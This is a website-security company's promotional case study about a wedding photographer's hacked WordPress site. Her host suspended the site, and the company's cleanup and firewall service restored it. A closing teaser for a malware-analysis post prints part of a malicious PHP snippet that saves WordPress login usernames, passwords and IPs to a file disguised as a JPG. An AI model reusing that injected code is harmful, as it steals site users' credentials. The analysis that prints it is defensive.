Spotlight: Website Security Response for Photographers

It takes a lot of bravery to create a small business. Putting yourself out there and taking risks is not for the faint of heart. Having a website is just one aspect of your business, but it’s an important one. A website helps you develop a brand identity, communicate the value of your offerings, and attract new customers.

These days, more business owners are leveraging open-source content management systems to create and maintain their website. One such business owner is Lisa Rigby, a wedding photographer from New England who has been in business since 2009. She was named one of the 30 Rising Stars of Wedding Photography by Rangefinder Magazine. Her website, lisarigbyphotography.com, gets over half its visitors from organic search and features galleries of her work for potential customers to view.

DIY Incident Response

Being in charge of both the business and the website, Lisa had a lot on her plate when she found that her website was crashing – right in the middle of wedding season. She took steps to call her hosting provider, BlueHost. They suggested that she should review her WordPress plugins due to the load on her server from too many PHP files running. When she went to do this, she found that she was unable to add plugins from her admin account.

The next step she took was to check Google Search Console, which showed warnings in the Security Issues section that indicated her website had been hacked.

After checking WordPress security forums, she realized she wasn’t alone. Other WordPress site owners were having the same problem – sites were crashing under brute force attacks and malicious traffic attempting to take her site down. She attempted to troubleshoot the problem with the help of her host and the WordPress community, spending two weeks trying to stabilize her website.

I’m just one person who has to do everything. I was trying to figure out IT problems and I’m not an IT person.

Suspended by Hosting Company

Lisa built her business and website to support her passion, and managed to take it to a place that supported her financially. It was more than just a hobby – she supported her career and livelihood with her website.

Being hacked feels like somebody robbed you, like they burglarized your house. A website is your private space. You feel assaulted.

According to Bluehost, Lisa had literally done everything right to secure her site, yet the problem continued. After attempts to resolve the problem came to no avail, BlueHost told Lisa they no longer were able to help. They took action by suspending her site because it was affecting other sites on the same shared server.

I’m literally crying. This is my income. This pays my mortgage. I was pleading to please don’t take my website down.

Bluehost recommended that she contact their partner company. Lisa decided to research alternatives, scouring Google for other website security companies who could help her find a more affordable solution.

Searching for Reliable Assistance

At this point her website had been suffering performance issues for weeks, and now it was down completely. She had to make a choice to spend additional time and effort on the problem (when both her host and the WordPress community didn’t have answers) or to place her trust in an organization that could guarantee a fix.

I might be stingy in my personal life but I always try to invest in my business. One thing I always think of is what is my time worth? I figured out over a few weeks I had spent over 50 hours trying to do it on my own. Every few days it was this cat and mouse game between me and these people.

She also reached out to her network of wedding photographers and found many people recommended Sucuri. She also saw that Sucuri had a lot of experience with WordPress security specifically, and better pricing for small businesses.

After assessing her options, she purchased a Complete Security package with Sucuri.

Back to Business

Lisa was ready to get back to working on her business and was relieved that she could get back to doing what she loved.

To be spending that much time… it was taking away from my actual photography work and this was my busy season.

The team at Sucuri had her back up and running much faster than expected. In addition to having a clean and functional website, with all of her images and galleries intact, she observed that her WordPress was much faster due to the performance improvements provided by the Sucuri Website Firewall (WAF).

I know the technician told me 24 hours to migrate but within hours the speed increased. I have not had one problem or one security breach. My website is completely flawless and faster than ever.

One lesson that Lisa learned from the process is that it makes sense to invest early in website security. It’s hard to calculate the loss in business and time when you try to resolve website security incidents on your own.

Unfortunately for most website owners, it takes an incident such as the one Lisa experienced to see the true value of professional website security services.

I believe it has to happen to you before doing anything about it. That’s one of the things I say to my peers. If you don’t have this now, it’s the best business insurance policy. It’s not expensive in general, but it really isn’t when you consider what it does.

Lisa is just one of several photographers featured on our Sucuri Customers page. If you run a photography website, or any site that supports turning your passion into a financial independence, it makes sense to have an insurance policy to protect it.

For more information on how we provide WordPress security, visit our website and chat with our Customer Happiness Team.

Read the Full Lisa Rigby Case Study!

If you would like to be featured as our next customer case study, email us at marketing@sucuri.net

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post